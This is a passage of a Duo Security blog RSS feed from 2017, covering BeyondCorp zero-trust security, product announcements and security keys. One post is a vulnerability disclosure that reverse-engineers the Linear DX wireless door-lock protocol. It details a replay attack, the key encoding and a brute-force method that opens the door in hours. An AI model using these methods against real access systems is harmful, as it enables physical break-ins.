<![CDATA[Duo Security Bulletin]]> https://duo.com/ Duo Security provides two-factor authentication and endpoint security as a service, built to protect against account takeover and data theft. en-us info@duosecurity.com Copyright 2017 3600 <![CDATA[RSAC 2017: BeyondCorp - How Google Protects Its Corporate Security Perimeter Without Firewalls]]> https://duo.com/blog/rsac-2017-beyondcorp-how-google-protects-its-corporate-security-perimeter-without-firewalls https://duo.com/blog/rsac-2017-beyondcorp-how-google-protects-its-corporate-security-perimeter-without-firewalls Tue, 21 Feb 2017 09:00:00 -0500

The RSA Conference 2017 is filled with an awful lot of noise, but many of the same themes resonated throughout the keynotes, sessions and vendor messaging.

One of those themes is around protecting the new perimeter-less enterprise IT model, using a new approach to security. Google’s Director of Information Security Heather Adkins and Site Reliability Engineering (SRE) Manager Rory Ward gave a talk about how Google solved this problem internally.

Moving to a Mobile, Distributed Workforce

Your enterprise is your castle - with the sensitive data inside, and a strong perimeter on the outside. Decades ago, you would typically connect hardware and software in your environment and enable firewalls to protect it all.

But as our workforces become more mobile, the inhabitants of the castle (your employees) started working outside of the castle. They needed a way to work remotely, and a way to work collaboratively with other people outside of the firewall.

Nowadays, many use the Swiss-cheese approach; building walls inside of the castle and using network segmentation, which can be difficult to maintain. Google’s network was similar, but soon, their challenges grew more and more complex as they struggled to support their employees working from all over the world.

They used a virtual private network (VPN) to extend the castle perimeter to the most popular mobile device of choice - the laptop. While users know VPNs, they don’t particularly like them - they’re unreliable, disconnect, tend to break often, and are heavyweight.

Google’s employees wanted to use their new tablets, laptops and phones. These devices are mobile and escape the network perimeter. Supporting these devices securely has become a business differentiator, allowing users to be more innovative, productive and seamlessly do work from all over the world.

What if Walls Never Worked?

This made Google question: What if walls never worked? What if firewalls never worked?

Google BeyondCorp - Walls Don't Work

Imagine a cosmopolitan city and busy road, where your employees are mingling with other people on the street. You can’t tell if they’re authorized or unauthorized by only their location on the street. The same goes for your users, based on the network they’re coming from.

These are Google’s BeyondCorp Principles:

  1. Connecting from a particular network must not determine which services you can access
  2. Access to services is granted based on what we know about you and your device
  3. All access to services must be authenticated, authorized and encrypted

Which helps Google’s security team achieve their goal of having every employee work successfully from untrusted networks, without the use of a VPN.

Implementing BeyondCorp

Rory explained how Google implemented BeyondCorp at Google and externalized their single sign-on (SSO) and access proxy. Now it is globally deployed and fully redundant, and took about two to three years to implement.

They relied on two major aspects:

  1. First, they got to know their users with a detailed user inventory that tracked users throughout their lifecycle and job function changes, and ensured that the information is updated as they move through the organization.
  2. Second, they got to know their devices with a device inventory that tracked devices from procurement to provisioning to end of life. They also track what happens when a device gets repaired or upgraded.

They also built a trust repository for their devices using device certificates that ingests data from about 20 different data sources about what the device is doing on the network.

Google’s security team also keeps a policy file that defines how to define trust for certain devices (i.e., if a device has been on the network for at least 20 days, or they may automatically mark mobile phones as low-trust). The trust of a particular device can also go up or down depending on what it has done, or what the policy says.

Google BeyondCorp - Access Control Engine

Rory referred to their ‘access control engine’ as a combination of an indication of who the user is, what the device is, and the resource it’s trying to get access to. For example, to access source code systems, you must be a full-time Google employee working in Engineering, using a fully-trusted desktop computer.

Migrating BeyondCorp

They deployed an unprivileged network in all 200 Google buildings, and compared the traffic to their new, no-privilege network. By sniffing their own traffic and looking at all user SAML traffic in the company via all network routers from their old network, they figured out what traffic would work on the new network, and what wouldn’t.

They installed an agent on every device and looked at every packet from that device, replaying it on the unprivileged network. They also built a migration pipeline, using big data to figure out what traffic would be on the new network. They moved tens of thousands of devices onto the new network.

BeyondCorp Outreach - White Papers

Google has released three white papers to help educate the industry on what they’re doing, why, and how:

Check out each of the abstracts above, as well as a link to download the full papers in PDF format from the Research at Google Publications library of resources.

BeyondCorp Deployment: Lessons Learned

They learned that they needed to get and retain executive support, especially since, in some cases, they would have to ask users to change how they operate on a day-to-day basis.

The clear wins included making IT simpler and more secure, as well as much happier users that were able to work from anywhere in the world. They also learned that data quality is key, and that they needed to make the migration painless for users.

Communication with their users was key to let them know what was happening, in addition to getting feedback from users on how they’re experiencing the migration to alleviate any distrust.

Additionally, they needed to run highly reliable systems, which is where site reliability engineering comes in. If the access policy doesn’t work, no one gets access.

Applying BeyondCorp

Others learn from Google’s example to apply BeyondCorp principles in their own organizations’ environments:

  1. Have zero trust in your network
  2. Base access decisions on what you know about the user and device
  3. Migrate carefully so as not to break existing users

Duo’s newest edition launched earlier this month is the first commercial implementation of Google’s BeyondCorp model. Duo Beyond allows you to identify corporate vs. personal devices with easy certificate deployment, block untrusted endpoints, and give your users secure access to internal applications without using VPNs.

All in addition to Duo’s easy-to-use two-factor authentication, secure single sign-on (SSO) and phishing vulnerability assessments.

]]>
<![CDATA[Flipping Bits and Opening Doors: Reverse Engineering the Linear Wireless Security DX Protocol]]> https://duo.com/blog/flipping-bits-and-opening-doors-reverse-engineering-the-linear-wireless-security-dx-protocol https://duo.com/blog/flipping-bits-and-opening-doors-reverse-engineering-the-linear-wireless-security-dx-protocol Mon, 20 Feb 2017 09:51:00 -0500

Like most companies these days, Duo employs a keycard-based access control system in our office. During my last trip to the office, I noticed that reception has a wireless remote to trigger the magnetic lock. This immediately piqued the interest of the Duo Labs team so we decided to do some poking and see what we can do with such a system.

Here we explore the implementation of a legacy, but still actively marketed, wireless physical security system as well as how it undermines more advanced security controls. Several vulnerabilities were identified:

  • The protocol itself is inherently vulnerable to replay attacks.
  • The key space was half of what is advertised by the manufacturer allowing for an attacker to brute-force entry in an average of 7 hours.
  • A quality assurance misstep allowed for some units to be brute-forced within 30 minutes.

Wireless Security System

Introduction

To get things started, we scribbled down the FCC ID off the back of the beige remote and dusted off a HackRF.

Wireless Security System FCC ID

The digital DX code format features over a million possible codes. The DX transmitters are precoded at the factory to unique codes, so no field coding is required. The multi-button transmitters send variations of their preset codes depending on which buttons are pressed.

The remote was identified as a Linear DXT-21 talking to a DXR-701 receiver operating at 315.0MHz. Looking over the documentation, a particular statement stood out:

The system had over a million possible codes! This might have been quite the claim in 1995 when the system was first introduced, but in the era of the $100 Software Defined Radio (SDR), it gave cause for concern.

First, we tried one of the most trivial of attacks: replay. Product documentation stated that these transmitters have a range of up to 700 feet. By recording from a distance what the transmitter sends and replaying it back from a SDR, an attacker might be able to trigger the receiver if the coding format was repetitive or fixed. The results spoke for themselves:

With the smell of blood in the water, we ordered a separate DXR-701 receiver and a bunch of DXT-21 remotes off of Amazon and rigged up a simple indicator light for when the internal relay strikes.

Indicator Light DXR-701

Getting the SDR out again, we began characterizing the signal. Pulling up the waterfall in GQRX and tuning to 315Mhz while tapping the transmit button, we could see very narrow bursts of data in the frequency domain. This implicated some form of amplitude modulation.

Amplitude Modulation

Hopping over to the time domain in GNURadio, we could clearly see data encoded some derivative of On-Off Keying: 17 relatively uniform peaks in a repeating pattern with a period of about 100ms.

GNURadio

DXT-21 Internals

With the general signaling understood, we decided to first peek under the covers of the remotes and see what other information we could gain.

Inside DXT-21 Remote

Inside we found a single-sided through-hole PCB with a very simple two-transistor transmitter with a single DIP18 microcontroller and a couple buttons. Peeling back the sticker on the controller revealed an 8-bit PIC microcontroller (PIC16C54A-04/P) with a manufacturing date code from 2015.

PIC Microcontroller

As the PIC16C series is EPROM-based, it can only be programmed once. I sucked the chips out of three of the boards and threw them into an old EPROM writer to see if I could dump the 512 byte firmware image stored onboard.

EPROM

The firmware code protection bit turned out to be set. Dumping the firmware would dump XOR hashes of some preceding bytes. Comparing the dumps of these three showed that the only difference between them was within the first three bytes:

Firmware Dump

I eventually put a socket on one of the PCBs so I could easily swap between the firmwares without juggling the eventual mess of a wire harness.

PCB Socket

DXR-701 Internals

With as much information extracted from the remotes as possible, I turned my aim to the receiver. Inside the DXR-701, I found a similar style of through-hole board construction with a few unpopulated components for the 2-channel variant. In the middle of the board sat a PIC16C56-XT/P microcontroller, identical to the one in the remote but with twice as much EPROM. Sucking out the PIC chip yielded similar scrambled results as that of the remotes.

DXR-701 Back

The back of the remotes had no components to speak of, but the back of the receiver held a lone Adesto 45DB041D-SU SOIC8 528K SPI flash chip positioned close to the microcontroller.

Circuit Flash Chip

One of my favorite tools for dealing with SPI buses is the BeagleBone Black. You can quite easily get the SPI bus exposed as a device node opening a range of options from direct scripting with pyspidev to using well-developed tools like flashrom. I wired up a SOIC8 chip clip to the BeagleBone and attached it to the flash chip in circuit.

Chip Clip

Having already paired a single remote out of the possible 32 into the receiver for testing, dumping the chip yielded some interesting results. Three distinct areas stood out. A single 0xFE at location 0x100, a single high entropy 264-byte page, and another 0xFE located at some arbitrary location.

Chip Dump 1

The receiver documentation made clear that the user should be careful not to program the same remote twice so I did just that and programmed a second instance. Dumping the flash after that showed the byte at 0x100 had decremented by 1, but all other data remained the same:

Dump 2

I thought this strange for so much data to be stored for a single key given that it occupies no more than three bytes in the transmitter’s firmware so I performed the forget-all-codes operation and dumped the receiver again to see what a non-programmed state looks like. Dumping that yielded a completely empty flash:

Dump 3

Reprogramming the same remote and dumping the flash again showed something unexpected. The high entropy page was completely gone! Only two addresses contained data.

Dump 4

I programmed two additional remotes into the receiver and dumped the flash to confirm my suspicions.

Dump 6

The high-entropy page was accidentally left in the flash from the factory. Probably a test pattern that wasn’t cleared. Predictably, with each additional key paired the value at 0x100 would decrement by 1 and a byte correlating to the key would be placed in the address space.

Signal Analysis

Based on these tests, it seemed odd that the receiver would have a 32-code memory limit as a key would occupy only a single byte across the expansive 528K flash. I changed the key count to 0xFE and flashed my custom image. I tried all three programmed keys and they all actuated the relay. The limit was completely arbitrary and unenforced outside of the programming mode.

This gave me a few potential avenues of attack and a series of questions. Could I identify the coding of the key to target specific flash addresses? Could that be pointed at the address of the key count? How fast could I iterate over the entire flash?

Probing around the transmitter, I discovered that two pins connecting to R9 and R7, that when driven high, would activate the the transmitter performing the OOK.

Activate Transmitter

Saleae Logic

With the ability to analyze the keying digitally, I set the HackRF aside and connected my 8 channel Saleae Logic clone. I took some captures of the various remotes that I had and put them on top of each other with an SDR-sourced waveform to compare against. Much of the coding became clear:

Waveform

All 17 pulses were of uniform 0.5ms width spread across a fixed 85ms window. There was a common series of three pulses that appeared to be a preamble, a series of five pulses for the postamble, and a series of nine pulses that varied in spacing for different keys with no symbol being closer than 0.8ms.

Doing some napkin math, of how many ways to scratter 9 0.8ms symbols across a timespan of 47ms yielded a number close to 100 million. This immediately felt off as the sales sheet brags about having over 1 million possible codes and marketing departments are rarely apt to under-advertise a product’s capabilities.

On a hunch, I logged and sorted all the inter-pulse delays that I had seen. It turned out that there were only 7 distinct values only 1.24ms apart from each other!

Inter-Pulse Delay

By plotting these values, it was clear that I had examples of all possible symbols:

Symbol Scatter

With this knowledge in hand, I could transform the captured waveforms into numeric symbol streams consisting of a two-symbol prefix, ten-symbol key and a five-symbol postfix with an irrelevant last digit being used as retransmission deadspace and served only as an end marker for the preceding digit.

Symbol Streams

To enumerate the entire possible key space, I could have done some complicated math but computers are fast -- so I took the brute-force approach and wrote a small utility to do it for me. This generated a list of all theoretically possible keys: 16,733,080 in total. This value was still larger than the advertised one million, but it was a start.

Test Harness

To try to correlate key values to SPI flash addresses, I would need samples. Lots of samples. Much more than the three remotes I had on hand. I needed some automation. Ideally, I wanted a setup where I could stimulate the receiver with a symbol sequence of my choosing and watch what traffic, if any, occurred between the PIC16 controller and the SPI flash chip.

To make a universal transmitter which could transmit any symbol sequence, I hijacked a remote’s RF stage as I had previously burned out my HackRF’s TX frontend.

Universal Transmitter

By bending the two signal pins out of their DIP socket, I could manually key the transmitter freely for up to 10 seconds before the PIC shutdown. I knew I’d want to transmit for longer periods than that, so I wired in permanent power and attached a lead to the PIC’s reset line that I could pull low between transmissions.

Keying the Transmitter

To drive all of this, I would need something to use as a reliable signal generator. I was already using a BeagleBone Black to do dump the SPI flash, so I decided to leverage one of the two internal Programmable Realtime Units (PRUs.) These RISC PRUs have a relatively fast 200Mhz clock and allow for single cycle IO access.

After a bit of futzing around with the instruction set, I had some PRU code and a utility that would take my symbol sequence and output the appropriate waveform all from the command line.

To correlate key values to flash addresses, I wired in my logic analyzer to the receiver and used a little-known feature of sigrok’s CLI utility to perform the live SPI protocol decoding. From that stream of SPI data, I could see what flash addresses were being accessed.

Wired Logic Analyzer

The SPI flash itself used 264-byte DataFlash pages. Data was accessed by specifying a 3-byte long locator consisting of an 11-bit page address and a 9-bit byte locator.

10-Symbol Key Fuzzing

After confirming that all the keys I had on hand were included in the output of my code generator, I grabbed a block of codes starting from a known key and passed them through the test harness.

To my delight, I started seeing responses. Not only was the test harness working, but as I iterated through the code generator’s output, the byte address being accessed by the controller would increment by one. After leaving the automation running for several thousand iterations, it became clear that the last four symbols of the key got encoded into a byte offset with consistent encoding, I had a list of all 256 possible values and they were consistent across different pages. However, the flash used 264 byte pages. The 9 bytes beyond that appeared to be unaddressable.

Next, I held the last four symbols static and repeated the test, fuzzing the lower six symbols that worked as page selectors. The page selectors also began to increment by one! By mixing and matching the lists, I could address arbitrary bytes from pages 0x401 to 0x7FF.

Key Address

Curiously, pages 0x00 to 0x400 were inaccessible. Even though all six of my remotes utilized same two symbol (63) prefix, there must be another page bit in what I assumed to be static two symbol prefix.

11-Symbol Key Fuzzing

By expanding the code generator to generate all possible 11 symbol codes, I could apply the same fuzzing strategy of holding the byte offset fixed and identify the lower pages as they would be encoded into the lower seven symbols. This yielded a list of 4,001 valid page addresses. Going back to our napkin math, 4,001 pages * 256 offsets = 1,024,256! Just as advertised!

However, astute readers would remember that the SPI flash is only half that size. Looking more closely at the code mappings revealed that most page addresses had two valid values.

Meaning, there are two keys that would resolve to the same address. For instance, both 33306033334 and 15306033334 map to flash address 0f,98,00 and trigger the relay. This cut the keyspace almost in half to only 2047 page selectors. This meant that there are only 524,032 truly unique remotes.

Postfix Fuzzing (Channel Selector)

The only curious thing that remained was the long four symbol postfix and what actually got written to the flash upon pairing a remote with a receiver. After fuzzing and identifying 8 traffic generating postfixes, it turned out these four symbols selected which bit would be cleared in the flash. All six of my DXT-21 remote keys ended in ‘2353’ which resulted in the bitmask of 0xFE being applied. I had a suspicion that this is how the multi-channel remotes are implemented.

To confirm, I sourced a DXT-42 three “code” remote. Through SPI traffic monitoring, it became clear that the code is consistent regardless of which button is pressed with the only difference being which mask is applied. Channel 1 applied a mask of 0xFE just like the DXT-21s do, Channel 2 utilized a mask of 0x7F and Channel 3 utilized 0xFD.

Channel

Exploitation

Now we had the full key-encoding definition:

Key-Encoding Definition

With this and knowlege of how to iterate over the entire key space, we can draw some conclusions about the complexity of brute-forcing these devices. Each code takes approximately 100ms to transmit and to be ingested by the receiver. Having only 524,032 unique keys, this means any given remote channel can be brute-forced in its totality in 14.5 hours, or just 7.25 hours on average, which is well within the realm of practical feasibility.

My receiver came with a dirty page with high entropy data in it out of the factory. The only “illegal” value for any given key would be 0xFF. If this manufacturing oversight is a common occurrence, then by trying 16 key combinations across the 2047 different pages, we would be able to trigger the relay in under half an hour on average. Worse yet, there is no way to tell if a unit is affected by this besides dumping the flash chip manually. Force clearing the memory of the receivers and re-pairing the remotes is a must.

When combined with the inherent vulnerability to replay attacks, the Linear DX system might be good enough to turn some Christmas lights off and on, but I wouldn’t trust it for its intended use of physical access control.

Code used for this project may be found on my github, here.

]]>
<![CDATA[BeyondCorp For The Rest Of Us]]> https://duo.com/blog/beyondcorp-for-the-rest-of-us https://duo.com/blog/beyondcorp-for-the-rest-of-us Wed, 08 Feb 2017 08:35:00 -0500

Rumor has it that the enterprise security perimeter is going to make a guest cameo on The Walking Dead. People have certainly been promoting the perimeter’s demise for years now: the Jericho Forum was created to tackle “de-perimeterisation” as early as 2003.

The idea really picked up steam as the cloud became more accepted as a common place to store and process data. Now that Google has come out and described in detail how they’ve made it happen, and dubbed it “BeyondCorp,” it’s within practical reach for many more organizations, with a concrete example to consider implementing.

The idea of getting rid of the perimeter is generally too scary for enterprises to contemplate, especially if they’ve only recently solidified one. So let’s not think of it as getting rid of the perimeter, but rather as tightening security on the inside so that the perimeter isn’t the only thing keeping the attacker at bay.

Here at Duo, we believe in the democratization of security. It’s all very well to talk about restructuring your IT when you have armies of technical talent and revenue that let you buy or build one of everything; but what about the rest of us? This is why Duo has come out with the first major commercial implementation of BeyondCorp, called Duo Beyond (read more about it here).

What’s BeyondCorp About?

Google’s vision is similar to John Kindervag’s “zero-trust model” of information security: to assume that no traffic within an enterprise’s network is any more trustworthy by default than traffic coming in from the outside. Of course, enterprises can’t operate without any kind of trust; the trick is to set the conditions under which they will decide to trust something.

Google’s implementation rests on the combination of validated users using validated endpoint devices, locked down with least-privilege segregation and end-to-end encryption. As long as the user is authenticated with the right number of factors, and is using an endpoint that has been enrolled and inspected for security vulnerabilities, they can access exactly those resources that they’re allowed to by a centralized proxy.

Duo BeyondCorp Diagram

As Google illustrates above (click to view larger), they rely on a device inventory database, a user/group database, and client-side certificates for strong identification and control. Obviously, this didn’t happen overnight. In order to migrate a huge and complex infrastructure to this model, they had to map and simulate workflows, using transition measures such as split DNS to make sure nothing broke while it was being gradually moved out of the “soft and chewy center.”

What Risks Does This Address?

The biggest one, of course, is that an attacker breaks through the perimeter and then has free rein within the trusted internal network. Google specifically referred to the “Aurora” attacks as an example of what prompted BeyondCorp. The counterpart to this risk is that you don’t have to start by breaking through the perimeter: if you’re an insider planning malfeasance, you’re already there. The traditional way to deal with this risk is to segment the network, but creating segmentation after the fact can be a major project, disrupting traffic and application tiers, and in many organizations, it never gets done. And let’s face it: a sufficiently successful outsider looks exactly like an insider.

Another risk is that the attacker exploits the gaps between different policies or enforcement that apply to the same asset. For example, if the same confidential data is available in two different systems using different types of authentication, the attacker will go after the one that’s easier to reach -- either because it trusts something else, or because that one authentication method has a flaw in it. You can prevent arbitrage by trusting nothing by default and making everyone pass the same tests each time.

A common risk that every organization faces is the vulnerable endpoint. At the very least, endpoints should be up to date on the operating system and plugins that they need to use. This isn’t always practical due to legacy software, but users who simply don’t get around to upgrading -- especially on their personal devices -- are a security headache for the enterprise.

With a centralized access proxy, you can have one set of policies for each application, regardless of where the system or user is located. A third-party SaaS could have the same trust requirements for access as an internal web application. This is important because attackers try to come from the “most trusted” location, whether that’s a known IP address, an “internal” system, or a favored geographic area. With the BeyondCorp model, it’s the combination of user and endpoint that earns the trust, not the network.

Note: you can have different requirements based on whether it’s an internal or external app, but once you start making that distinction, you’re back on the road to destroying that security model you just tried to implement. Make sure your policies are based on business criticality and confidentiality, not on “inside” versus “outside.”

What Should Organizations Think About?

If you’re already in the hybrid environment -- with some of your infrastructure on-premises and some in the cloud -- it’s time to think about how you could potentially use the BeyondCorp model to re-balance your security policies, because you already have assets that aren’t within your perimeter. For those with a large network who haven’t been able to segment it as much as they’d like, or for tighter control, the BeyondCorp model may offer a chance to focus on combining user and endpoint verification with encryption.

The good news is that you don’t have to do this all at once. While Google’s description of a comprehensive migration sounds daunting, moving to this different concept of security also works when you do it incrementally. Remember, you’re not actually getting rid of the perimeter controls; you’re raising the level of security on the inside so that it looks more like the outside. Any progress is a significant improvement.

Here are some of the high-level steps to plan for:

  1. Enroll your users and their endpoints. This may require a discovery process, since users might not always be using the corporate assets you assigned them. By routing those users to a popular application through an authentication gateway such as the ones that Duo provides, you can get an inventory on the fly.

  2. Deploy certificates to the user endpoints that you want to mark as “managed” or “trusted.” The level of trust is up to you, but for some organizations, it means that they’re officially supported and maintained by the enterprise; for others who embrace BYOD, it means that they’ve done the initial hygiene check during enrollment and validated that the user really is using that device. In the case of Duo Beyond, the certificates and PKI (public key infrastructure) are created as part of the service, but they can also work with an existing PKI.

  3. Create access policies based on the requirements for each application or system you want to protect. These policies can include how often you want users to re-authenticate; whether they can use personal devices; and which level of hygiene you want to enforce. These policies can be adjusted dynamically based on security events. For example, if a new vulnerability is being actively exploited in a particular endpoint OS or plugin, you can block affected users until they update it. This drives users to update on their own rather than waiting for IT to organize a scheduled maintenance window (no more Terror Tuesday!).

  4. Profit! Well, maybe not profit, but benefit from better visibility and a tighter set of controls over what your users and endpoints are accessing, regardless of where they are. By adapting to the new reality -- that applications, users and devices can change locations at the drop of a hat -- you’ll be able to maintain a more consistent level of security and user experience.

Since BeyondCorp is a concept, not a specific product, you’ll see a growing number of variations on the theme as companies large and small implement it. Look for more blog entries on this topic as Duo supports this movement Beyond the traditional security limits.

]]>
<![CDATA[Announcing Our New Edition, Duo Beyond!]]> https://duo.com/blog/announcing-our-new-edition-duo-beyond https://duo.com/blog/announcing-our-new-edition-duo-beyond Wed, 08 Feb 2017 08:30:00 -0500

Today, we’re excited to announce some major changes to our product line. We are introducing a new edition, Duo Beyond, to help address security challenges as customers increase adoption of cloud applications and BYOD initiatives.

Duo Beyond is modeled after Google’s BeyondCorp security architecture - a radical shift from traditional perimeter-based security models. It assumes a zero-trust environment across the organization, ensuring that no traffic within an enterprise’s network is, by default, any more trustworthy than traffic coming in from the outside. You can read our blog on Google BeyondCorp for more information.

Duo Beyond provides increased security by addressing three main use cases for modern corporate IT environments:

  • Differentiating between corporate and personal devices
  • Limiting sensitive data access to only corporate devices
  • Limiting remote access to specific applications without exposing the network

Let’s examine each of these in greater detail.

Trusted Endpoints and Protecting Sensitive Data

With Duo Beyond, we are introducing our Trusted Endpoints feature, which allows customers to easily identify their company-owned and personal laptops accessing corporate applications. Traditionally, this was done using a combination of various security technologies, spanning across endpoint protection platforms (EPP), network access control (NAC), virtual private networks (VPNs), client certificates, and public key infrastructures (PKIs).

Duo is making this process radically simple; administrators can distribute Duo certificates to their corporate laptops to mark them as ‘Trusted’ without having to deploy their own public key infrastructure or NAC solution. Through our beta testing with over 100 customers, we’ve seen most customers fully deploy certificates within 2 hours. This is a significant reduction compared to traditional NAC deployments, which often take several months to complete.

We also gathered some great insight on BYOD trends. Generally, about one-third of all laptops in a company’s environment tend to be corporate devices, while two-thirds of the devices are personally owned (which companies have no visibility or control over). This further validates the security concerns brought on by BYOD adoption.

In addition to providing visibility into which devices are corporate-managed and which are personally owned, Duo also allows you to control access based on the same attributes. If a laptop has a Duo certificate, it is therefore considered a trusted endpoint. These policies can be created at the global, application, or user level; they can be applied to any web-based application regardless of whether it’s hosted in the cloud or on-premises.

Throughout our beta program, we saw a common use case where customers enforced a higher level of trust for privileged account access. For example, regular users were able to log into Salesforce.com with any laptop as long as it was up to date and had proper security settings enabled, such as disk encryption, passcode enforcement, etc. (also enforced with Duo’s Trusted Access platform). However, Salesforce administrators’ accounts were only accessible using devices that had a valid Duo certificate.

A Better Way to Secure Remote Access

Duo Beyond also provides a simple and secure way for companies to provide remote access to corporate applications without exposing the rest of the network. While VPNs have traditionally solved remote access requirements, there are still some drawbacks:

  • VPN clients are clunky and provide a sub-par user experience. Connections are often slow and unreliable, leading to end user frustrations.
  • It’s difficult to segment network access using a VPN. Once a user logs in, they often have access to the entire network, which presents a security challenge.

Customers can now use Duo’s secure single sign-on to give end users one consistent login experience while accessing any cloud or on-premises application. Best of all, users don’t have to go through a VPN, meaning companies can provide remote access to certain applications without exposing the rest of the network. This not only improves overall security posture, but it also introduces cost savings.

For many companies, the vast majority of remote employees use VPN tunnels only for a few web applications. By moving access to those applications out of the VPN, companies would be able to retire the vast majority of their VPN licenses.

Other Notable Changes

To make our product offerings even easier to understand, we are renaming the existing Duo editions to better align with our customers’ requirements. Here is the new Duo product lineup, effective February 8, 2017:

New Duo Editions

Finally, we are integrating Duo Insight, our free phishing simulation tool into Duo Access. In July 2016, we introduced this tool to help organizations measure their exposure to targeted phishing attacks for free. This is critical to understanding user risk and successfully implementing two-factor authentication to protect against credential theft. Duo Access and Duo Beyond customers can now launch unlimited phishing simulations to measure this risk in their employee base.

We’ve made a number of (positive) new changes to our editions - check out our Customer FAQ to learn how this affects you.

]]>
<![CDATA[Google, Facebook Amp Up Authentication With Security Keys]]> https://duo.com/blog/google-facebook-amp-up-authentication-with-security-keys https://duo.com/blog/google-facebook-amp-up-authentication-with-security-keys Mon, 06 Feb 2017 09:00:00 -0500

Now Facebook and Google Suite users can use a security key to authenticate and verify their identities during login, as reported by Threatpost and TechCrunch.

As a secure method of two-factor authentication, security keys are physical hardware tokens that plug into a USB port on your laptop.

After typing in their username and password, a user is prompted to complete two factor. By tapping the key, a user can generate a unique passcode that grants them access to Facebook or Google’s suite of cloud-based productivity apps (formerly known as Google Apps).

A More Secure Way to Ensure Trusted Users

Without physical access to the device and security key, a threat actor can’t gain unauthorized access to your accounts. This method also thwarts phishing and other data-stealing attacks that count on usernames and passwords alone to give them easy, unfettered access to your accounts.

Security keys are also more secure than SMS-based two-factor authentication (2FA). This is when a user must verify their identity by typing in a verification code sent via text message to their phone. An attacker can intercept SMS messages and log in as the user.

Back in July of last year, the U.S. National Institute for Standards and Technology (NIST) announced they would be deprecating SMS-based 2FA in their guidelines for digital authentication, deeming it no longer secure enough to recommend to anyone for remote access.

In addition to being more susceptible to phishing attempts, SMS 2FA also relies on the security of the telephony and carrier infrastructure, which is typically not very secure. Plus, many apps on the average phone have access to the SMS inbox, which could lead to easily stolen one-time passcodes - find out more in Duo Aligns With NIST on New Authentication Guidelines.

Security keys send cryptographic proof that users are, in fact, on a legitimate Google site and in physical possession of their security keys, stopping attackers that are remotely attempting to access accounts remotely, according to the Google Account Security team.

Even More Security Precautions Announced By Google

In addition to adding security key support for authentication, Google announced the availability of a hosted S/MIME service that ensures Gmail messages are encrypted, beyond TLS capabilities, to secure every hop an email makes throughout the delivery life cycle before it reaches your inbox.

This adds account-level signature authentication, unlike domain-based authentication. It can allow email receivers to verify that the email is actually coming from the sending account and not just a matching domain, according to Google, as reported by Threatpost.

Here’s hoping it cuts down on phishing email campaigns that leverage similar and matching domain names to lure users and their inboxes into a false sense of security.

Universal 2nd Factor by FIDO Alliance

The Fast IDentity Online (FIDO) Alliance created a strong industry standard for two-factor authentication known as Universal 2nd Factor (U2F).

Google, Facebook, Duo and many others announced support in 2014 for the hardware-based authentication standard that both simplifies the login process while providing stronger security for users. The method only requires a web browser, operating system and U2F device.

Once enrolled with Duo, users can tap the USB device plugged into their laptop to verify their identities and quickly log in. The USB device protects private keys with a tamper-proof component known as a secure element (SE). Learn more about U2F.

]]>
<![CDATA[Discover Duo's Healthcare Security Solutions at 2017 HIMSS]]> https://duo.com/blog/discover-duos-healthcare-security-solutions-at-2017-himss https://duo.com/blog/discover-duos-healthcare-security-solutions-at-2017-himss Thu, 02 Feb 2017 09:00:00 -0500

Duo Security is packing our bags for the leading health IT conference, the Healthcare Information and Management Systems Society (HIMSS) 2017, running Feb. 19-23 in Orlando at the Orange County Convention Center.

More than 40,000 health IT professionals, clinicians, executives and vendors from around the world will be on hand at this conference that brings together more than 300 programs spanning keynotes, thought leader sessions, roundtable discussions and workshops.

If you plan to attend, visit us at booth #277, where we’re showing off Duo’s two-factor authentication and endpoint security solutions with an eye toward the healthcare industry, serving organizations like hospitals, healthcare systems and university health systems.

You can find us on the expo floor during these hours:

  • Monday, February 20, 10 a.m. - 6 p.m.
  • Tuesday, February 21, 9:30 a.m. - 6 p.m.
  • Wednesday, February 22, 9:30 a.m. - 4 p.m.

Say hello, get answers to some of your security questions and enjoy some free swag!

Protecting Patient Data with Duo

We provide information security solutions that integrate with electronic healthcare record systems (EHRs) to protect patient data from unauthorized access. Duo offers secure two-factor authentication that’s quick and easy for busy healthcare professionals to use. Choose from a variety of authentication methods:

  • Single Sign-On - Securely access all enterprise cloud applications by logging into a web portal once.
  • Duo Push - Send a push notification to your device, and log in by taping ‘Approve.’
  • Phone Callback - Call a phone, then log in by answering and pressing a key.
  • SMS Passcode - Get an SMS message with a code, type it in and log in.

HIPAA Security Rule guidelines on accessing electronic protected health information (ePHI) recommend using two-factor authentication to mitigate the risk of lost or stolen credentials that could result in unauthorized access to ePHI.

Two-factor authentication is also required by the Drug Enforcement Agency’s mandates for securing e-prescriptions. Practitioners must use two forms of identification for identity-proofing, to sign and verify digital prescriptions.

Duo also offers comprehensive endpoint visibility, tracking outdated or vulnerable devices that attempt to authenticate into your environment, and offering your users and admins the ability to update those devices.

With customizable policy and controls, you can block at-risk devices from connecting to your network, reducing the risk of transferring malware or allowing external attackers to exploit vulnerabilities to breach your company. Learn more about Duo's solutions for Healthcare.

Altegra Health Case Study

With Duo Security, Altegra Health was able to deploy two-factor authentication to cover Virtual Desktop Infrastructure (VDI) desktops. Duo offered Altegra Health a much easier deployment process, inexpensive overhead costs and minimal strain to their small support team.

Duo alleviated Altegra's concerns about network connectivity issues by offering a variety of different authentication methods, including SMS-based passcodes and phone callbacks for authenticating while offline.

Our admins love Duo's easy and intuitive administrative panel. Our users like that it doesn’t disrupt their workflow more than necessary. — Mark Kueffner, Senior Director of IT Systems Architecture & Operations

Read the full Altegra Health case study, and browse our other case studies.

Guide to Securing Patient Data

Healthcare Guide Duo developed this guide to examine some of the ways that patient data can be vulnerable and how you can protect it. To learn more about patient data security, download Duo Security's Guide to Securing Patient Data: Breach Prevention Doesn’t Have to Be Brain Surgery.

To help you navigate patient data security, our guide will:

  • summarize relevant health IT security legislation, including federal and state
  • provide information security guidelines on remote access risks and solutions
  • provide extensive security resources and a real hospital case study
  • explain how to protect against modern attacks and meet regulatory compliance with two-factor authentication

Ideal for CISOs, security, compliance and risk management officers, IT administrators and other professionals concerned with information security, this guide is for IT decision-makers that need to implement strong authentication security, as well as those evaluating two-factor authentication solutions for organizations in the healthcare industry.

Download the free guide today.

]]>
<![CDATA[Banking Malware Dridex Targets U.K. Financial Institutions]]> https://duo.com/blog/banking-malware-dridex-targets-uk-financial-institutions https://duo.com/blog/banking-malware-dridex-targets-uk-financial-institutions Tue, 31 Jan 2017 09:00:00 -0500

A number of U.K.-based financial institutions were hit by a wave of financial banking malware, delivered via phishing email campaigns, Threatpost reported.

Last year, Dridex was reported as one of the most dangerous variants of financial malware in circulation. According to Flashpoint, the malware is back this year with new techniques to bypass security and steal user data.

